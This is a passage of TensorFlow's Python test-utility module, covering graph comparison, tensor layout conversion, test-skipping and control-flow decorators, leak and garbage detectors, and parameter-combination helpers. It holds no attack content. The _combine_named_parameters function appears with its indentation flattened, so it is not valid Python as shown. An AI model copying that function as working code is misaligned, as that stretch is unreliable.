    TypeError: If either argument is not a `GraphDef`.
  """
  # Plain pass-through; the shared helper does the work.
  assert_equal_graph_def(actual, expected,
                         checkpoint_v2=checkpoint_v2,
                         hash_table_shared_name=hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
                           hash_table_shared_name=False):
  """Shared implementation behind the v1/v2 assert_equal_graph_def wrappers."""
  if not isinstance(actual, graph_pb2.GraphDef):
    raise TypeError("Expected tf.GraphDef for actual, got %s" %
                    type(actual).__name__)
  if not isinstance(expected, graph_pb2.GraphDef):
    raise TypeError("Expected tf.GraphDef for expected, got %s" %
                    type(expected).__name__)

  # Normalize both sides before comparing so that randomized attrs
  # (checkpoint temp names, hash-table shared names) do not cause diffs.
  normalizers = []
  if checkpoint_v2:
    normalizers.append(_strip_checkpoint_v2_randomized)
  if hash_table_shared_name:
    normalizers.append(_strip_hash_table_shared_name)
  for normalize in normalizers:
    normalize(actual)
    normalize(expected)

  diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
                                                expected.SerializeToString())
  if diff:
    raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
  """Compares MetaGraphDefs `a` and `b` in unit test class `tester`.

  Note: mutates `a` and `b` (clears `collection_def` and `graph_def` fields
  after comparing them field-by-field).

  Args:
    tester: A `unittest.TestCase`-like object providing assert methods.
    a: First `MetaGraphDef` to compare.
    b: Second `MetaGraphDef` to compare.
  """
  # Carefully check the collection_defs
  tester.assertEqual(set(a.collection_def), set(b.collection_def))
  collection_keys = a.collection_def.keys()
  for k in collection_keys:
    a_value = a.collection_def[k]
    b_value = b.collection_def[k]
    proto_type = ops.get_collection_proto_type(k)
    if proto_type:
      a_proto = proto_type()
      b_proto = proto_type()
      # Number of entries in the collections is the same
      tester.assertEqual(
          len(a_value.bytes_list.value), len(b_value.bytes_list.value))
      for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
                                              b_value.bytes_list.value):
        a_proto.ParseFromString(a_value_item)
        b_proto.ParseFromString(b_value_item)
        tester.assertProtoEquals(a_proto, b_proto)
    else:
      # FIX: use assertEqual; assertEquals is a deprecated alias removed in
      # newer Python versions, and the rest of this function already uses
      # assertEqual.
      tester.assertEqual(a_value, b_value)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("collection_def")
  b.ClearField("collection_def")

  # Check the graph_defs.
  assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
  # Check graph_def versions (ignored by assert_equal_graph_def).
  tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("graph_def")
  b.ClearField("graph_def")

  tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
# Example match: "_temp_0123456789abcdef0123456789abcdef/part".
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
  """Deletes node attrs whose single string tensor value matches the
  randomized sharded-save pattern, mutating `graph_def` in place."""
  sharded_pattern = compat.as_bytes(_SHARDED_SAVE_OP_PATTERN)
  for node in graph_def.node:
    # Collect first, delete after: never mutate a map while iterating it.
    doomed_keys = []
    for attr_key in node.attr:
      tensor_value = node.attr[attr_key].tensor
      if not (tensor_value and len(tensor_value.string_val) == 1):
        continue
      string_value = tensor_value.string_val[0]
      if string_value and re.match(sharded_pattern, string_value):
        doomed_keys.append(attr_key)
    for attr_key in doomed_keys:
      del node.attr[attr_key]
# Matches auto-generated (randomized) shared_name attrs on HashTableV2 ops.
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
  """Drops randomized shared_name attrs from HashTableV2 nodes in place."""
  table_pattern = compat.as_bytes(_TABLE_SHARED_NAME_PATTERN)
  for node in graph_def.node:
    if node.op != "HashTableV2" or "shared_name" not in node.attr:
      continue
    if re.match(table_pattern, node.attr["shared_name"].s):
      del node.attr["shared_name"]
# Thin wrappers exposing native build-configuration flags. CamelCase names are
# kept for backward compatibility with existing callers.


def IsGoogleCudaEnabled():
  # True when TensorFlow was built with Google CUDA support.
  return _pywrap_util_port.IsGoogleCudaEnabled()


def IsBuiltWithROCm():
  # True when TensorFlow was built with ROCm (AMD GPU) support.
  return _pywrap_util_port.IsBuiltWithROCm()


def IsBuiltWithXLA():
  # True when TensorFlow was built with XLA support.
  return _pywrap_util_port.IsBuiltWithXLA()


def IsBuiltWithNvcc():
  # True when TensorFlow was compiled with nvcc (rather than clang).
  return _pywrap_util_port.IsBuiltWithNvcc()


def GpuSupportsHalfMatMulAndConv():
  # True when the GPU supports float16 matmul and convolution kernels.
  return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()


def IsMklEnabled():
  # MKL/oneDNN counts as enabled either when compiled in, or when opted in
  # at runtime via the TF_ENABLE_ONEDNN_OPTS environment variable.
  return (_pywrap_util_port.IsMklEnabled() or
          os.getenv("TF_ENABLE_ONEDNN_OPTS", "False").lower() in ["true", "1"])


def InstallStackTraceHandler():
  # Installs the native handler that prints a stack trace on crash signals.
  _pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
  """Converts the input from the NHWC format to NCHW.

  Args:
    input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor rank -> permutation that moves the channel axis to position 1
  axis_orders = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
  if isinstance(input_tensor, ops.Tensor):
    order = axis_orders[input_tensor.shape.ndims]
    return array_ops.transpose(input_tensor, order)
  order = axis_orders[len(input_tensor)]
  return [input_tensor[axis] for axis in order]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
  """Transforms the input from the NHWC layout to NCHW_VECT_C layout.

  Note: Does not include quantization or type conversion steps, which should
  be applied afterwards.

  Args:
    input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NCHW_VECT_C

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not evenly
      divisible by 4.
  """
  permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  if is_tensor:
    temp_shape = input_shape_or_tensor.shape.as_list()
  else:
    # NOTE: when given a shape list, it is modified in place below
    # (matching the long-standing behavior of this helper).
    temp_shape = input_shape_or_tensor
  if temp_shape[-1] % 4 != 0:
    raise ValueError(
        "Last dimension of input must be evenly divisible by 4 to convert to "
        "NCHW_VECT_C.")
  # Split the channel axis into channels/4 and a trailing vector axis of 4.
  temp_shape[-1] //= 4
  temp_shape.append(4)
  permutation = permutations[len(temp_shape)]
  if not is_tensor:
    return [temp_shape[axis] for axis in permutation]
  reshaped = array_ops.reshape(input_shape_or_tensor, temp_shape)
  return array_ops.transpose(reshaped, permutation)
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
  """Transforms the input from the NCHW_VECT_C layout to NHWC layout.

  Note: Does not include de-quantization or type conversion steps, which
  should be applied beforehand.

  Args:
    input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NHWC

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not 4.
  """
  permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  if is_tensor:
    input_shape = input_shape_or_tensor.shape.as_list()
  else:
    input_shape = input_shape_or_tensor
  if input_shape[-1] != 4:
    raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
  permutation = permutations[len(input_shape)]
  # Fold the trailing vector-of-4 axis back into the channel axis.
  nhwc_shape = [input_shape[axis] for axis in permutation[:-1]]
  nhwc_shape[-1] *= input_shape[-1]
  if not is_tensor:
    return nhwc_shape
  transposed = array_ops.transpose(input_shape_or_tensor, permutation)
  return array_ops.reshape(transposed, nhwc_shape)
def NCHWToNHWC(input_tensor):
  """Converts the input from the NCHW format to NHWC.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor rank -> permutation that moves the channel axis to the end
  axis_orders = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
  if isinstance(input_tensor, ops.Tensor):
    order = axis_orders[input_tensor.shape.ndims]
    return array_ops.transpose(input_tensor, order)
  order = axis_orders[len(input_tensor)]
  return [input_tensor[axis] for axis in order]
def skip_if(condition):
  """Skips the decorated function if condition is or evaluates to True.

  Args:
    condition: Either an expression that can be used in "if not condition"
      statement, or a callable whose result should be a boolean.

  Returns:
    The wrapped function
  """

  def real_skip_if(fn):

    # FIX: preserve the wrapped function's __name__/__doc__ so test runners
    # and debuggers report the original test, not "wrapper".
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
      skip = condition() if callable(condition) else condition
      if not skip:
        return fn(*args, **kwargs)
      # When skipped, fall through and return None (original behavior).

    return wrapper

  return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
  """Context manager to skip cases not considered failures by the tests.

  Note that this does not work if used in setUpClass/tearDownClass.
  Usage in setUp/tearDown works fine just like regular test methods.

  Args:
    test_obj: A test object provided as `self` in the test methods; this object
      is usually an instance of `unittest.TestCase`'s subclass and should have
      `skipTest` method.
    error_type: The error type to skip. Note that if `messages` are given, both
      `error_type` and `messages` need to match for the test to be skipped.
    messages: Optional, a string or list of strings. If `None`, the test will be
      skipped if `error_type` matches what is raised; otherwise, the test is
      skipped if any of the `messages` is contained in the message of the error
      raised, and `error_type` matches the error raised.

  Yields:
    Nothing.
  """
  if messages:
    messages = nest.flatten(messages)
  try:
    yield
  except error_type as e:
    # Re-raise when messages were given but none of them matched;
    # otherwise convert the error into a test skip.
    if messages and not any(message in str(e) for message in messages):
      raise
    test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
def enable_c_shapes(fn):
  """No-op decorator kept for compatibility. TODO(b/74620627): Remove this."""
  return fn
def with_c_shapes(cls):
  """No-op class decorator kept for compatibility. TODO(b/74620627): Remove this."""
  return cls
def enable_control_flow_v2(fn):
  """Decorator for enabling CondV2 and WhileV2 on a test.

  Note this enables using CondV2 and WhileV2 after running the test class's
  setup/teardown methods.

  In addition to this, callers must import the while_v2 module in order to set
  the _while_v2 module in control_flow_ops.

  Args:
    fn: the function to be wrapped

  Returns:
    The wrapped function
  """

  def wrapper(*args, **kwargs):
    saved_flag = control_flow_util.ENABLE_CONTROL_FLOW_V2
    control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
    try:
      return fn(*args, **kwargs)
    finally:
      # Always restore the previous global flag, even on test failure.
      control_flow_util.ENABLE_CONTROL_FLOW_V2 = saved_flag

  return wrapper
def with_control_flow_v2(cls):
  """Adds methods that call original methods with WhileV2 and CondV2 enabled.

  Note this enables CondV2 and WhileV2 in new methods after running the test
  class's setup method.

  In addition to this, callers must import the while_v2 module in order to set
  the _while_v2 module in control_flow_ops.

  If a test function has _disable_control_flow_v2 attr set to True (using the
  @disable_control_flow_v2 decorator), the v2 function is not generated for it.

  For every eligible test method `testFoo`, a sibling
  `testFooWithControlFlowV2` is added that runs the same body with the v2
  control-flow flag enabled (and restored afterwards).

  Args:
    cls: class to decorate

  Returns:
    cls with new test methods added
  """
  # Nothing to do when v2 control flow is already globally enabled.
  if control_flow_util.ENABLE_CONTROL_FLOW_V2:
    return cls

  test_prefix = unittest.TestLoader.testMethodPrefix
  # Iterate over a snapshot: setattr below mutates cls.__dict__.
  for name, value in list(cls.__dict__.items()):
    is_test_method = callable(value) and name.startswith(test_prefix)
    if is_test_method and not getattr(value, "_disable_control_flow_v2", False):
      setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
  return cls
def disable_control_flow_v2(unused_msg):
  """Decorator for a function in a with_control_flow_v2 enabled test class.

  Blocks the function from being run with v2 control flow ops.

  Args:
    unused_msg: Reason for disabling.

  Returns:
    The wrapped function with _disable_control_flow_v2 attr set to True.
  """

  def _mark(func):
    # with_control_flow_v2 reads this marker to skip v2 variant generation.
    setattr(func, "_disable_control_flow_v2", True)
    return func

  return _mark
def enable_output_all_intermediates(fn):
  """Force-enable outputing all intermediates from functional control flow ops.

  Args:
    fn: the function to be wrapped

  Returns:
    The wrapped function
  """

  def wrapper(*args, **kwargs):
    saved_override = (
        control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE)
    control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
    try:
      return fn(*args, **kwargs)
    finally:
      # Restore the previous override even when the wrapped call raises.
      control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = (
          saved_override)

  return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
  """Decorator for asserting that no new Python objects persist after a test.

  Runs the test multiple times executing eagerly, first as a warmup and then to
  let objects accumulate. The warmup helps ignore caches which do not grow as
  the test is run repeatedly.

  Useful for checking that there are no missing Py_DECREFs in the C exercised by
  a bit of Python.

  Args:
    func: The function to test.
    warmup_iters: The number of warmup iterations, excluded from measuring.

  Returns:
    The wrapped function performing the test.
  """

  def wrap_f(f):

    def decorator(self, *args, **kwargs):
      """Warms up, gets object counts, runs the test, checks for new objects."""
      with context.eager_mode():
        # GC is disabled for the whole measurement so that object counts are
        # not perturbed by collections happening mid-run.
        gc.disable()
        # Run the test 2 times as warmup, in an attempt to fill up caches, which
        # should not grow as the test is run repeatedly below.
        #
        # TODO(b/117156879): Running warmup twice is black magic; we have seen
        # tests that fail with 1 warmup run, and pass with 2, on various
        # versions of python2.7.x.
        for _ in range(warmup_iters):
          f(self, *args, **kwargs)
        # Since we aren't in the normal test lifecycle, we need to manually run
        # cleanups to clear out their object references.
        self.doCleanups()

        # Some objects are newly created by _get_object_count_by_type().  So
        # create and save as a dummy variable to include it as a baseline.
        obj_count_by_type = _get_object_count_by_type()
        gc.collect()

        # Make sure any registered functions are cleaned up in the C++ runtime.
        registered_function_names = context.context().list_function_names()

        # unittest.doCleanups adds to self._outcome with each unwound call.
        # These objects are retained across gc collections so we exclude them
        # from the object count calculation.
        obj_count_by_type = _get_object_count_by_type(
            exclude=gc.get_referents(self._outcome.errors,
                                     self._outcome.skipped))

        # Snapshot collection sizes so growth can be reported explicitly below
        # (gc.get_objects misses C-level containers).
        if ops.has_default_graph():
          collection_sizes_before = {
              collection: len(ops.get_collection(collection))
              for collection in ops.get_default_graph().collections
          }
        # The measured runs: any objects created here that survive cleanup are
        # reported as leaks.
        for _ in range(3):
          f(self, *args, **kwargs)
        # Since we aren't in the normal test lifecycle, we need to manually run
        # cleanups to clear out their object references.
        self.doCleanups()
        # Note that gc.get_objects misses anything that isn't subject to garbage
        # collection (C types). Collections are a common source of leaks, so we
        # test for collection sizes explicitly.
        if ops.has_default_graph():
          for collection_key in ops.get_default_graph().collections:
            collection = ops.get_collection(collection_key)
            size_before = collection_sizes_before.get(collection_key, 0)
            if len(collection) > size_before:
              raise AssertionError(
                  ("Collection %s increased in size from "
                   "%d to %d (current items %s).") %
                  (collection_key, size_before, len(collection), collection))
            # Make sure our collection checks don't show up as leaked memory by
            # removing references to temporary variables.
            del collection
            del collection_key
            del size_before
          del collection_sizes_before
        gc.collect()

        # There should be no new Python objects hanging around.
        obj_count_by_type = (
            _get_object_count_by_type(
                exclude=gc.get_referents(self._outcome.errors,
                                         self._outcome.skipped)) -
            obj_count_by_type)

        # There should be no newly registered functions hanging around.
        leftover_functions = (
            context.context().list_function_names() - registered_function_names)
        assert not leftover_functions, (
            "The following functions were newly created: %s" %
            leftover_functions)
        # In some cases (specifically on MacOS), new_count is somehow
        # smaller than previous_count.
        # Using plain assert because not all classes using this decorator
        # have assertLessEqual
        assert not obj_count_by_type, (
            "The following objects were newly created: %s" %
            str(obj_count_by_type))
        gc.enable()

    return decorator

  # Supports both @decorator and @decorator(warmup_iters=...) usage.
  if func is None:
    return wrap_f
  else:
    return wrap_f(func)
def assert_no_new_tensors(f):
  """Decorator for asserting that no new Tensors persist after a test.

  Mainly useful for checking that code using the Python C API has correctly
  manipulated reference counts.

  Clears the caches that it knows about, runs the garbage collector, then checks
  that there are no Tensor or Tensor-like objects still around. This includes
  Tensors to which something still has a reference (e.g. from missing
  Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
  of the objects has __del__ defined).

  Args:
    f: The test case to run.

  Returns:
    The decorated test case.
  """

  def decorator(self, **kwargs):
    """Finds existing Tensors, runs the test, checks for new Tensors."""

    def _is_tensorflow_object(obj):
      # Guarded isinstance: gc.get_objects() can yield objects that are
      # already partially torn down.
      try:
        return isinstance(obj,
                          (ops.Tensor, variables.Variable,
                           tensor_shape.Dimension, tensor_shape.TensorShape))
      except (ReferenceError, AttributeError):
        # If the object no longer exists, we don't care about it.
        return False

    # Snapshot ids only (not the objects), to avoid creating new references.
    tensors_before = set(
        id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
    outside_executed_eagerly = context.executing_eagerly()
    # Run the test in a new graph so that collections get cleared when it's
    # done, but inherit the graph key so optimizers behave.
    outside_graph_key = ops.get_default_graph()._graph_key
    with ops.Graph().as_default():
      ops.get_default_graph()._graph_key = outside_graph_key
      if outside_executed_eagerly:
        with context.eager_mode():
          result = f(self, **kwargs)
      else:
        result = f(self, **kwargs)
    # Make an effort to clear caches, which would otherwise look like leaked
    # Tensors.
    context.context()._clear_caches()  # pylint: disable=protected-access
    gc.collect()
    tensors_after = [
        obj for obj in gc.get_objects()
        if _is_tensorflow_object(obj) and id(obj) not in tensors_before
    ]
    if tensors_after:
      raise AssertionError(("%d Tensors not deallocated after test: %s" % (
          len(tensors_after),
          str(tensors_after),
      )))
    return result

  return decorator
def _find_reference_cycle(objects, idx):
  """Builds a referrer graph from objects[idx] and logs one cycle, if any.

  Returns True when a reference cycle was found (and logged via
  logging.error), False otherwise.
  """

  def get_ignore_reason(obj, denylist):
    """Tests whether an object should be omitted from the dependency graph."""
    # Cap recursion depth via the size of the accumulated denylist.
    if len(denylist) > 100:
      return "<depth limit>"
    if tf_inspect.isframe(obj):
      if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
        return "<test code>"
    for b in denylist:
      if b is obj:
        return "<test code>"
    if obj is denylist:
      return "<test code>"
    return None

  # Note: this function is meant to help with diagnostics. Its output is purely
  # a human-readable representation, so you may freely modify it to suit your
  # needs.
  def describe(obj, denylist, leaves_only=False):
    """Returns a custom human-readable summary of obj.

    Args:
      obj: the value to describe.
      denylist: same as denylist in get_ignore_reason.
      leaves_only: boolean flag used when calling describe recursively. Useful
        for summarizing collections.
    """
    if get_ignore_reason(obj, denylist):
      return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
    if tf_inspect.isframe(obj):
      return "frame: {}".format(tf_inspect.getframeinfo(obj))
    elif tf_inspect.ismodule(obj):
      return "module: {}".format(obj.__name__)
    else:
      if leaves_only:
        return "{}, {}".format(type(obj), id(obj))
      elif isinstance(obj, list):
        return "list({}): {}".format(
            id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
      elif isinstance(obj, tuple):
        return "tuple({}): {}".format(
            id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
      elif isinstance(obj, dict):
        return "dict({}): {} keys".format(id(obj), len(obj.keys()))
      elif tf_inspect.isfunction(obj):
        return "function({}) {}; globals ID: {}".format(
            id(obj), obj.__name__, id(obj.__globals__))
      else:
        return "{}, {}".format(type(obj), id(obj))

  def build_ref_graph(obj, graph, reprs, denylist):
    """Builds a reference graph as <referrer> -> <list of referents>.

    Args:
      obj: The object to start from. The graph will be built by recursively
        adding its referrers.
      graph: Dict holding the graph to be built. To avoid creating extra
        references, the graph holds object IDs rather than actual objects.
      reprs: Auxiliary structure that maps object IDs to their human-readable
        description.
      denylist: List of objects to ignore.
    """
    referrers = gc.get_referrers(obj)
    # Exclude the referrers list itself from further traversal.
    denylist = denylist + (referrers,)

    obj_id = id(obj)
    for r in referrers:
      if get_ignore_reason(r, denylist) is None:
        r_id = id(r)
        if r_id not in graph:
          graph[r_id] = []
        # Only recurse on first discovery of this edge, preventing
        # infinite recursion on cyclic structures.
        if obj_id not in graph[r_id]:
          graph[r_id].append(obj_id)
          build_ref_graph(r, graph, reprs, denylist)
          reprs[r_id] = describe(r, denylist)

  def find_cycle(el, graph, reprs, path):
    """Finds and prints a single cycle in the dependency graph."""
    if el not in graph:
      return
    for r in graph[el]:
      if r in path:
        logging.error("Reference cycle sample:")
        for p in path + (r,):
          logging.error(reprs.get(p, "unknown object " + str(p)))
        return True
      else:
        if find_cycle(r, graph, reprs, path + (r,)):
          return True
    return False

  obj = objects[idx]
  graph = {}  # referrer ID -> object ID
  reprs = {}  # object ID -> description
  # The denylist contains this function's own locals/helpers so the traversal
  # does not report the diagnostic machinery itself.
  build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
                                      describe, build_ref_graph, find_cycle))
  for k in graph:
    if find_cycle(k, graph, reprs, ()):
      return True
  return False
def assert_no_garbage_created(f):
  """Test method decorator to assert that no garbage has been created.

  Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
  cannot be un-set (i.e. will disable garbage collection for any other unit
  tests in the same file/shard).

  Args:
    f: The function to decorate.

  Returns:
    The decorated function.
  """

  def decorator(self, **kwargs):
    """Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
    # Force-load `distribution_strategy_context` to prevent GC at
    # test time when using eager. Remove once b/117329403 is resolved.
    tape.distribution_strategy_context.get_strategy()
    # With DEBUG_SAVEALL set, every collectable object ends up in gc.garbage
    # instead of being freed, so the length delta measures what the test
    # created.
    gc.disable()
    previous_debug_flags = gc.get_debug()
    gc.set_debug(gc.DEBUG_SAVEALL)
    gc.collect()
    previous_garbage = len(gc.garbage)
    result = f(self, **kwargs)
    gc.collect()
    new_garbage = len(gc.garbage)
    if new_garbage > previous_garbage:
      for i, obj in enumerate(gc.garbage[previous_garbage:]):
        # Known false positive for ast.fix_missing_locations.
        # NOTE(review): subtracts 3 per ast-module object — presumably the
        # object plus two companions in the same cycle; confirm the constant.
        if getattr(obj, "__module__", "") == "ast":
          new_garbage -= 3
    if new_garbage > previous_garbage:
      logging.error(
          "The decorated test created work for Python's garbage collector, "
          "likely due to a reference cycle. New objects in cycle(s):")
      for i, obj in enumerate(gc.garbage[previous_garbage:]):
        try:
          logging.error("Object %d of %d", i,
                        len(gc.garbage) - previous_garbage)

          def _safe_object_str(obj):
            # Avoids calling the object's own __str__/__repr__, which may
            # itself raise for half-collected objects.
            return "<%s %d>" % (obj.__class__.__name__, id(obj))

          logging.error(" Object type: %s", _safe_object_str(obj))
          logging.error(
              " Referrer types: %s", ", ".join(
                  [_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
          logging.error(
              " Referent types: %s", ", ".join(
                  [_safe_object_str(ref) for ref in gc.get_referents(obj)]))
          logging.error(" Object attribute names: %s", dir(obj))
          logging.error(" Object __str__:")
          logging.error(obj)
          logging.error(" Object __repr__:")
          logging.error(repr(obj))
        except Exception:  # pylint: disable=broad-except
          logging.error("(Exception while printing object)")
    # When garbage is created, this call can help identify reference cycles,
    # which are typically the cause of such garbage.
    if new_garbage > previous_garbage:
      for i in range(previous_garbage, new_garbage):
        if _find_reference_cycle(gc.garbage, i):
          break
    # This will fail if any garbage has been created, typically because of a
    # reference cycle.
    self.assertEqual(previous_garbage, new_garbage)
    # TODO(allenl): Figure out why this debug flag reset doesn't work. It would
    # be nice to be able to decorate arbitrary tests in a large test suite and
    # not hold on to every object in other tests.
    gc.set_debug(previous_debug_flags)
    gc.enable()
    return result

  return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
  """Generate combinations based on its keyword arguments using combine().

  This function calls combine() and appends a testcase name to the list of
  dictionaries returned. The 'testcase_name' key is a required for named
  parameterized tests.

  Args:
    **kwargs: keyword arguments of form `option=[possibilities, ...]` or
      `option=the_only_possibility`.

  Returns:
    a list of dictionaries for each combination. Keys in the dictionaries are
    the keyword argument names. Each key has one value - one of the
    corresponding keyword argument values.
  """
  named_combinations = []
  for combination in _combine_named_parameters(**kwargs):
    assert isinstance(combination, OrderedDict)
    # Build a name suffix out of the alphanumeric characters of each
    # key/value pair, e.g. {"mode": "eager"} -> "_mode_eager".
    suffix = "".join(
        "_{}_{}".format("".join(filter(str.isalnum, key)),
                        "".join(filter(str.isalnum, str(value))))
        for key, value in combination.items())
    named = OrderedDict(combination)
    named["testcase_name"] = "_test{}".format(suffix)
    named_combinations.append(named)
  return named_combinations
def run_all_in_graph_and_eager_modes(cls):
  """Execute all test methods in the given class with and without eager."""
  for attr_name in dir(cls):
    is_test = attr_name.startswith(unittest.TestLoader.testMethodPrefix)
    # Tests prefixed testSkipEager/test_skip_eager opt out of the eager run;
    # `test_session` is a fixture helper, not a test.
    if (not is_test or
        attr_name.startswith(("testSkipEager", "test_skip_eager")) or
        attr_name == "test_session"):
      continue
    attr = getattr(cls, attr_name, None)
    if callable(attr):
      setattr(cls, attr_name, run_in_graph_and_eager_modes(attr))
  return cls
def build_as_function_and_v1_graph(func=None):
  """Run a test case in v1 graph mode and inside tf.function in eager mode.

  WARNING: This decorator can only be used in test cases that statically checks
  generated graph. Attempting to evaluate graph or function results via.
  session.run() or self.evaluate() will fail.

  WARNING: This decorator can only be used for test cases that inherit from
  absl.testing.parameterized.TestCase.

  Args:
    func: Test case function to be decorated.

  Returns:
    Decorated test case function.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError(
          "`run_in_graph_mode_and_function` only supports test methods.")

    @parameterized.named_parameters(("_v1_graph", "v1_graph"),
                                    ("_function", "function"))
    @functools.wraps(f)
    def decorated(self, run_mode, *args, **kwargs):
      if run_mode == "v1_graph":
        with ops.Graph().as_default():
          f(self, *args, **kwargs)
      elif run_mode == "function":

        @def_function.function
        def function_in_eager():
          f(self, *args, **kwargs)

        # Create a new graph for the eagerly executed version of this test for
        # better isolation.
        graph_for_eager_test = ops.Graph()
        with graph_for_eager_test.as_default(), context.eager_mode():
          function_in_eager()
        ops.dismantle_graph(graph_for_eager_test)
      else:
        # BUG FIX: the original code did `return ValueError(...)`, which
        # silently handed the exception object back to the test runner instead
        # of raising it, so unknown run modes went unnoticed.
        raise ValueError("Unknown run mode %s" % run_mode)

    return decorated

  if func is not None:
    return decorator(func)
  return decorator
def run_in_async_and_sync_mode(f):
  """Execute the test in async mode and sync mode."""

  @parameterized.named_parameters([("Async", True), ("", False)])
  @functools.wraps(f)
  def decorator(self, async_mode, *args, **kwargs):
    # Select the execution mode once, then run the body under it.
    mode = context.ASYNC if async_mode else context.SYNC
    with context.execution_mode(mode):
      f(self, *args, **kwargs)

  return decorator
def run_in_graph_and_eager_modes(func=None,
                                 config=None,
                                 use_gpu=True,
                                 assert_no_eager_garbage=False):
  """Execute the decorated test with and without enabling eager execution.

  This function returns a decorator intended to be applied to test methods in
  a `tf.test.TestCase` class. Doing so will cause the contents of the test
  method to be executed twice - once normally, and once with eager execution
  enabled. This allows unittests to confirm the equivalence between eager
  and graph execution (see `tf.compat.v1.enable_eager_execution`).

  For example, consider the following unittest:

  ```python
  class MyTests(tf.test.TestCase):

    @run_in_graph_and_eager_modes
    def test_foo(self):
      x = tf.constant([1, 2])
      y = tf.constant([3, 4])
      z = tf.add(x, y)
      self.assertAllEqual([4, 6], self.evaluate(z))

  if __name__ == "__main__":
    tf.test.main()
  ```

  This test validates that `tf.add()` has the same behavior when computed with
  eager execution enabled as it does when constructing a TensorFlow graph and
  executing the `z` tensor in a session.

  `deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
  `run_in_graph_and_eager_modes` are available decorators for different
  v1/v2/eager/graph combinations.

  Args:
    func: function to be annotated. If `func` is None, this method returns a
      decorator the can be applied to a function. If `func` is not None this
      returns the decorator applied to `func`.
    config: An optional config_pb2.ConfigProto to use to configure the session
      when executing graphs.
    use_gpu: If True, attempt to run as many operations as possible on GPU.
    assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
      collector and asserts that no extra garbage has been created when running
      the test with eager execution enabled. This will fail if there are
      reference cycles (e.g. a = []; a.append(a)). Off by default because some
      tests may create garbage for legitimate reasons (e.g. they define a class
      which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
      Python interpreters (meaning that tests which rely on objects being
      collected elsewhere in the unit test file will not work). Additionally,
      checks that nothing still has a reference to Tensors that the test
      allocated.

  Returns:
    Returns a decorator that will run the decorated test method twice:
    once by constructing and executing a graph in a session and once with
    eager execution enabled.
  """

  def decorator(f):
    if tf_inspect.isclass(f):
      raise ValueError(
          "`run_in_graph_and_eager_modes` only supports test methods. "
          "Did you mean to use `run_all_in_graph_and_eager_modes`?")

    def decorated(self, *args, **kwargs):
      # First pass: graph mode inside a test session. A SkipTest here skips
      # only the graph half; the eager half below still runs.
      try:
        with context.graph_mode():
